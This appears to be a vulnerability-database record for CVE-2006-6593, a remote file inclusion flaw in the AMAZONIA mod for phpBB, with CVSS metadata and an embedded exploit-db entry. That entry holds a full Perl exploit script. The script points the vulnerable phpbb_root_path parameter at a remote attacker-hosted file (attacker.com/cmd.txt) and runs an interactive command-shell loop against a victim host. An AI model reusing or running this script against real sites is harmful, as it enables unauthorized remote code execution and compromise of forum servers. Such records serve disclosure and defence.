ID OSVDB:30902
Type osvdb
Reporter OSVDB
Modified 2006-10-12T12:30:52
Description
No description provided by the source
References:
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0218.html
ISS X-Force ID: 29566
CVE-2006-6593
Bugtraq ID: 20526
{"bulletinFamily": "software", "viewCount": 3, "reporter": "OSVDB", "references": [], "description": "# No description provided by the source\n\n## References:\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0218.html\nISS X-Force ID: 29566\n[CVE-2006-6593](https://vulners.com/cve/CVE-2006-6593)\nBugtraq ID: 20526\n", "affectedSoftware": [], "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "b72d0076ff5e50b70913cee7ed981156"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "bc45ff3f97a31d95bc6b604a5a0340c4"}, {"key": "href", "hash": "4b8e88b63d1998ecd014e7143a686615"}, {"key": "modified", "hash": "2692c893fed10dac0b46f36ae3c71523"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "2692c893fed10dac0b46f36ae3c71523"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "955b328dc7cd615c13af5464c9183464"}, {"key": "title", "hash": "b1c602d95ccc205b8c277435b7a8b64e"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "href": "https://vulners.com/osvdb/OSVDB:30902", "modified": "2006-10-12T12:30:52", "objectVersion": "1.2", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-6593"]}, {"type": "exploitdb", "idList": ["EDB-ID:2544"]}], "modified": "2017-04-28T13:20:27"}, "vulnersScore": 7.5}, "id": "OSVDB:30902", "title": "AMAZONIA for phpBB zufallscodepart.php phpbb_root_path Variable Remote File Inclusion", "hash": "e81c8cf73c55e4494e1083a9f3a8983edf4b4b9eb72e96b9abf710d7e600686d", "edition": 1, "published": "2006-10-12T12:30:52", "type": "osvdb", "history": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "cvelist": ["CVE-2006-6593"], "lastseen": "2017-04-28T13:20:27"}
{"cve": [{"lastseen": "2018-10-18T15:05:38", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in zufallscodepart.php in AMAZONIA MOD for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.", "modified": "2018-10-17T17:49:14", "published": "2006-12-15T14:28:00", "id": "CVE-2006-6593", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-6593", "title": "CVE-2006-6593", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T16:31:00", "bulletinFamily": "exploit", "description": "phpBB Amazonia Mod (zufallscodepart.php) Remote File Include Exploit. CVE-2006-6593. Webapps exploit for php platform", "modified": "2006-10-13T00:00:00", "published": "2006-10-13T00:00:00", "id": "EDB-ID:2544", "href": "https://www.exploit-db.com/exploits/2544/", "type": "exploitdb", "title": "phpBB Amazonia Mod zufallscodepart.php Remote File Include Exploit", "sourceData": "#!/usr/bin/perl\n \n#####################################################################################################\n# #\n# AMAZONIA MOD ( for phpbb forums ) #\n# #\n# Class: Remote File Include Vulnerability #\n# #\n# Patch: unavailable #\n# #\n# Date: 2006/10/12 #\n# #\n# Remote: Yes #\n# #\n# Type: high #\n# #\n# Site: http://www.superphotos.info/Amazonia_Mod.htm #\n# #\n#####################################################################################################\n\n\nuse IO::Socket;\nuse LWP::Simple;\n\n$cmdshell=\"http://attacker.com/cmd.txt\"; # <====== Change This Line With Your Personal Script\n\nprint \"\\n\";\nprint \"######################################################################\\n\";\nprint \"# #\\n\";\nprint \"# AMAZONIA MOD Remote File Include Vulnerability #\\n\";\nprint \"# Bug found By : Ashiyane Corporation #\\n\";\nprint \"# Email: nima salehi nima[at]ashiyane.ir #\\n\";\nprint \"# Web Site : www.Ashiyane.ir #\\n\";\nprint \"# #\\n\";\nprint \"######################################################################\\n\";\n\n\nif (@ARGV < 2)\n{\n print \"\\n Usage: Ashiyane.pl [host] [path] \";\n print \"\\n EX : Ashiyane.pl www.victim.com /path/ \\n\\n\";\nexit;\n}\n\n\n$host=$ARGV[0];\n$path=$ARGV[1];\n$vul=\"zufallscodepart.php?phpbb_root_path=\"\n\nprint \"Type Your Commands ( uname -a )\\n\";\nprint \"For Exiit Type END\\n\";\n\nprint \"<Shell> \";$cmd = <STDIN>;\n\nwhile($cmd !~ \"END\") {\n $socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Could not connect to host.\\n\\n\";\n\n print $socket \"GET \".$path.$vul.$cmdshell.\"?cmd=\".$cmd.\"? HTTP/1.1\\r\\n\";\n print $socket \"Host: \".$host.\"\\r\\n\";\n print $socket \"Accept: */*\\r\\n\";\n print $socket \"Connection: close\\r\\n\\n\";\n\n while ($raspuns = <$socket>)\n {\n print $raspuns;\n }\n\n print \"<Shell> \";\n $cmd = <STDIN>;\n}\n\n# milw0rm.com [2006-10-13]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2544/"}]}
